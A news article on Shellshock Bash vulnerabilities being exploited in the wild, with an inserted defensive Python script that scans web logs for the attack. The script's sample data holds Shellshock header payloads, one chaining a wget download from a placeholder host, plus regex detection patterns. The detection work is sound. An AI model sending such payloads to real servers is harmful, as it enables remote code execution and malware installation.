Shellshock vulnerabilities exploited in the wild

News by Steve Gold

Linux: open source software is highly pervasive, making the Shellshock vulnerability potentially more serious than Heartbleed.

Within a week of the Shellshock (aka Bash - CVE-2014-6271) vulnerability being discovered by researcher Stephane Chazelas, the first exploits have now been spotted in the wild.

As previously reported, Shellshock is a vulnerability that allows an attacker to perform remote code execution attacks on any server using the Bash shell.

Unfortunately, the use of this shell is widespread, as it is used in many server products, including those powering web sites. According to Carl Leonard, the regional head of Websense's EMEA research, malware found to be exploiting the Shellshock vulnerability has been dropped by various command-and-control servers previously known to Websense Security Labs.

"The malware has been seen to be downloaded to a compromised machine by exploiting the Shellshock vulnerability and invoking commands such as 'curl' or 'wget' and then executing the malicious payload. To date, we have seen four variants of the Linux backdoor and several versions of the Perl-based IRC bot," he says in his analysis of the problem.

Multiple vulnerabilities

Perhaps worse, Leonard and his team report that, since the initial disclosure of CVE-2014-6271, Websense has seen another five vulnerabilities identified in Bash. These have been assigned the identifiers of CVE-2014-6277, CVE-2014-6278, CVE-2014-7169, CVE-2014-7186 and CVE-2014-7187.

Experience, he says, has taught us that as cyber-criminals zoom in on the vulnerable code branch, additional vulnerabilities are likely to surface.  

"We strongly recommend that you monitor such issues and apply mitigation accordingly," he advises.

Fellow security vendor FireEye, meanwhile, says that it has discovered a real example of cybercriminals attempting to exploit the Bash remote code injection vulnerability against Network Attached Storage (NAS) systems.

Apple patches incomplete

Just to make life interesting, although Apple has released a patch for Shellshock, Greg Wiseman, an engineering manager with Rapid7, claims that the patch only solves two of the three problems.

Wiseman is quoted by the CNET newswire as saying he ran a script to test for Bash/Shellshock vulnerabilities and found that even after installing Apple's patch on OS X Mountain Lion, the operating system was still susceptible to another vulnerability - CVE-2014-7186.

So how bad is the evolving situation?

Leeds-based security specialist RandomStorm says that it has warned customers to scan their Linux, Mac OS and Unix OS servers - and connected devices - for the problem.

Andrew Mason, RandomStorm's technical director, said that he and his team are advising all of their customers to run a scan for CVE-2014-6271 to check whether their Unix and Linux servers and networked devices - such as cameras and alarms - contain the Bash vulnerability.

"As soon as a patch is released, we will update our xStorm service and we have emailed our customers to provide further guidance on updating their appliances," he said, adding that detailed information about this vulnerability can be found on Red Hat Bugzilla.

Lucas Zaichkowsky, enterprise defence architect with AccessData, said there are similarities between Shellshock and Heartbleed in that there are many software packages - including server software - that rely on commands and scripts and use the Bourne-again shell (Bash) by default.

"Companies should immediately scan everything exposed to the Internet for this vulnerability, then apply mitigating controls and available patches. After that, they should waste no time scanning internal systems for vulnerable software. 

"It's trivial for attackers to gain entry to an internal system at which point vulnerable internal systems could be exploited. They should also set up network intrusion detection systems to detect attacks and enable logging that would allow them to record exploitation. That will allow them to know if they've already been attacked," he explained.
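The logging and detection Zaichkowsky calls for, as an added example that is not from the article or from any vendor quoted in it: a small Python scanner over web server access logs that flags the Bash function-definition prefix in the two client-supplied headers a CGI server exports into the environment, and raises the severity when a download helper of the kind Websense observed is chained behind it. The log lines, IP addresses and the example.invalid host are constructed sample data.

```python
import re
from typing import Dict, List

# Constructed Apache combined-format log lines (sample data, not from the article).
# Lines 1-2 are ordinary traffic (a plain curl client is not an attack by itself);
# lines 3-4 carry a Bash function definition in a request header, the CVE-2014-6271
# pattern, one of them chaining the wget-style download the article describes.
SAMPLE_LOG = r'''
198.51.100.7 - - [25/Sep/2014:10:02:11 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.8 - - [25/Sep/2014:10:02:15 +0000] "GET /cgi-bin/status HTTP/1.1" 200 88 "-" "curl/7.37.0"
203.0.113.5 - - [25/Sep/2014:10:03:01 +0000] "GET /cgi-bin/status HTTP/1.1" 200 88 "-" "() { :;}; /bin/bash -c 'wget http://example.invalid/x'"
203.0.113.9 - - [25/Sep/2014:10:03:44 +0000] "GET /cgi-bin/status HTTP/1.1" 500 0 "() {:;}; echo check" "Mozilla/5.0"
'''

# Apache/nginx "combined" format: Referer and User-Agent are the two client-controlled
# headers that a CGI server copies into environment variables before running a script.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
# "() {" is the start of an exported Bash function definition; \s* tolerates the
# spacing variants seen in probes ("(){", "( ) {") so trivial reformatting is caught.
SHELLSHOCK_RE = re.compile(r'\(\s*\)\s*\{')
# A download helper in the same header is the payload-drop stage Websense reported.
DOWNLOADER_RE = re.compile(r'\b(curl|wget)\b')


def scan_log(text: str) -> List[Dict[str, str]]:
    """Return one finding per header value that carries the Shellshock pattern."""
    findings: List[Dict[str, str]] = []
    for line in text.strip().splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # malformed line; a production job would count and report these
        for header in ("ua", "referer"):
            value = m.group(header)
            if not SHELLSHOCK_RE.search(value):
                continue
            staged = DOWNLOADER_RE.search(value) is not None
            findings.append({
                "ip": m.group("ip"),
                "ts": m.group("ts"),
                "request": m.group("req"),
                "header": header,
                # A downloader chained behind the marker means a payload may have landed.
                "severity": "high" if staged else "medium",
                "evidence": value,
            })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['severity']:6} {f['ip']:12} {f['header']:8} {f['evidence']}")
```

Run it against real access logs by passing the file contents to scan_log; a hit on a 200 response to a CGI path is the case to triage first.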

Zaichkowsky went on to say that companies should also be aware of breaches happening to other organisations, as it is common for attackers to steal user passwords from one Web site, which they then use to gain entry into other businesses.

"The fact that this vulnerability has been around for so many years in such a common software package with source code open for anyone to review should act as a wake-up call to the fact that there are undiscovered, or even worse, undisclosed software vulnerabilities everywhere," he said.

"Attackers will always find ways to breach systems. Organisations must invest security resources into detecting and responding to attackers as they break into their network and snoop around," he added.

Joe Hancock, a cyber security specialist with Aegis, the Lloyd's of London syndicate, said that Shellshock may be larger than Heartbleed in its scope, owing to the fact it has effectively been around for 25 years, making it exceptionally pervasive.

"As well as Web servers and other applications, the Bash software is also used by many home broadband routers. The bug is relatively simple to use - attackers can simply copy a few lines of code freely available on the Internet," he said.

"Bugs in broadband routers have been previously used to attack over 300,000 routers found in small offices or homes and are likely to be used in this way again, most likely as part of a cyber-crime campaign. These attacks primarily took advantage of the router's default username and passwords to issue commands," he added.

Hancock went on to say that the devices most at risk are those that make up the Internet of Things or Industrial Control Systems.

"Any legacy device that uses a set of Web scripts to interact directly with the underlying Linux operating system via Bash could be potentially remotely monitored or controlled. For example a major control systems vendor's Programmable Logic Controllers use the Linux operating system, which has previously been shown to use the Bash software internally," he said.

"In some areas this will be a challenge to fix, as many embedded devices are not designed with regular updates in mind and will never be able to be patched," he added.
